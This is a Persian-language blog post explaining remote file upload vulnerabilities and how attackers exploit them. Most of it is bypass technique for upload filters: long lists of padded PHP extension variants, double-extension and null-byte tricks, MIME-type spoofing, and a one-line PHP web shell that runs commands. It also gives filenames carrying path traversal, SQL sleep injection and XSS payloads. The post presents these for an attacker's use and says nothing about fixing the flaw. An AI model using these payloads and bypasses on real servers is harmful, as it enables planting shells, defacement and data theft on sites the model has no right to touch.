باگ RFU:

باگ RFU:اسیب پذیری rfu یک اسیب پذیری خطرناک در اپلیکیشن های وب بیس میباشددر وب سرور های مختلف این باگ کاملا بستگی به نارگت مورد نظر دارد.این اسیب پذیری به ما اجازه میدهد که یک فایلی با محتوای مخرب (انواع شل) اپلود کنیم که در سرور اجرا شود حمله گر با استفاده از این باگ میتواند یک پیج فیشینگ در وبسایت قرار دهد یا ان را به اصطلاح دیفیس کند(تغییر ظاهر سایت)حمله گر میتواند در بعضی شرایط به دیتا های حساس وب سرور دسترسی پیدا کند و یا اطلاعات مهم سرور را به مراجعه کنندگان سایت نشان دهدبا این باگ چه کارهایی میشود کرد:ما میتوانیم با استفاده از تزریق شل هایی با زبان های دلخواه مانند php به اسیب پذیری اجزای کد از راه دور و همچنین به باگ هایی مانند XSS,LFI,XXE,PHISHING,الوده کردن پارامتر ها,تزریق کد SQL دست یابیم که باعث افشا شدن اطلاعات,مسیر ها و … میشودانواع فیلتر ها برای جلوگیری از این باگ:1-بایپس بلک لیست:این فیلتر را میتوان با اپلود اکستنشن های غیر معمول پی اچ پی بایپس کرد.اینجا چند مثال برای شما اماده شده است.بهترین راه بایپس این فیلتر دیکود کردن میباشدphtmlphp3php4php5incpHtmlpHppHp3pHp4pHp5iNciNc iNc%20%20%20iNc%20%20%20…%20.%20..iNc……inc inc%20%20%20inc%20%20%20…%20.%20..inc……pHp pHp%20%20%20pHp%20%20%20…%20.%20..pHp……pHp3 pHp3%20%20%20pHp3%20%20%20…%20.%20..pHp3……pHp4 pHp4%20%20%20pHp4%20%20%20…%20.%20..pHp4……pHp5 pHp5%20%20%20pHp5%20%20%20…%20.%20..pHp5……pHtml pHtml%20%20%20pHtml%20%20%20…%20.%20..pHtml……php php%20%20%20php%20%20%20…%20.%20..php……php3 php3%20%20%20php3%20%20%20…%20.%20..php3……php4 php4%20%20%20php4%20%20%20…%20.%20..php4……php5 php5%20%20%20php5%20%20%20…%20.%20..php5……phtml phtml%20%20%20phtml%20%20%20…%20.%20..phtml……2-بایپس لیست سفید:این روش را میتوان از طریق حقه هایی مانند استفاده از دو اکستنشن (image.png.php)یا با استفاده از null byte injection بایپس کرد(image.php .png)راهنما:برای بدست اوردن اکستنشن غیر معمول قابل پذیرش توسط سایت میتوان از روش بروت فورس استفاده کرد3-دستکاری فیلد content-type یا MIME type:این فیلد را میتوان از طریق تبدیل ان به میم تایپ های قابل قبول سایت بایپس کرد(برای مثال تبدیل application/php به image/png یا سایر میم تایپ های قابل قبول )4- فیلتر محدودیت حجم فایل اپلود شده:با استفاده از پیلود های کم حجم میتوانیم این فیلتر را بایپس بکنیم مانند:sample payload<?php if($_GET[‘c’]) { system($_GET[‘c’]); } ?>نکته های دیگر:1-استفاده از اسم فایل هایی مانند logo.png/../.. برای پیمایش دایرکتوری ها با استفاده از اپلود فایل2-اپلود فایل با استفاده از کامند sleep(10).jpg.اگر فایل مستقیما در دیتابیس قرار گیرد امکان دسترسی به sql هست3-چک کردن اکتنشن svq. برای اپلود فایل.با استفاده از این میتوانیم به XSS های ذخیره شده با پیلود XML دسترسی پیدا کنیم4-تغییر اسم فایل به پیلود های XSS (<svg =alert(document.domain)> برای دسترسی به باگ XSS

Author: admin

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *